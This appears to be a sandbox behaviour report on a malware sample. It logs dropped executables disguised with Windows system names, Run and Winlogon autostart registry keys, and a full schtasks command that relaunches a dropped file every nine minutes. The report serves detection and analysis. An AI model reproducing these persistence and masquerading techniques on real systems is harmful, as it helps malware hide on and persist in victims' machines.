Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files with benign system names
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Users\user\3D Objects\services.exe Jump to dropped file
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Recovery\smss.exe Jump to dropped file
Drops PE files
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Users\user\3D Objects\services.exe Jump to dropped file
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Program Files\Google\Chrome\Application\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Jump to dropped file
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Program Files\Windows Media Player\Skins\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Jump to dropped file
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Users\user\Music\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Jump to dropped file
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Recovery\smss.exe Jump to dropped file
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Jump to dropped file
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\ProgramData\USOShared\Logs\dllhost.exe Jump to dropped file
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Windows\Fonts\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Jump to dropped file
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Jump to dropped file
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Program Files\Google\Chrome\Application\SetupMetrics\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Jump to dropped file
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\MoUsoCoreWorker.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\ProgramData\USOShared\Logs\dllhost.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Windows\Fonts\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Jump to dropped file

Boot Survival
barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Creates an undocumented autostart registry key
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Creates multiple autostart registry keys
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MoUsoCoreWorker Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run services Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smss Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XYIphamTjljSgoBQQlfKpXxgNOIOX" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\common files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe'" /f
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Users\Default\Start Menu\Programs\MoUsoCoreWorker.exe Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Users\Default\Start Menu\Programs\1f93f77a7f4778 Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smss Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smss Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MoUsoCoreWorker Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MoUsoCoreWorker Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MoUsoCoreWorker Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MoUsoCoreWorker Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run services Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run services Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run services Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run services Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XYIphamTjljSgoBQQlfKpXxgNOIO Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MoUsoCoreWorker Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MoUsoCoreWorker Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Process information set: NOOPENFILEERRORBOX
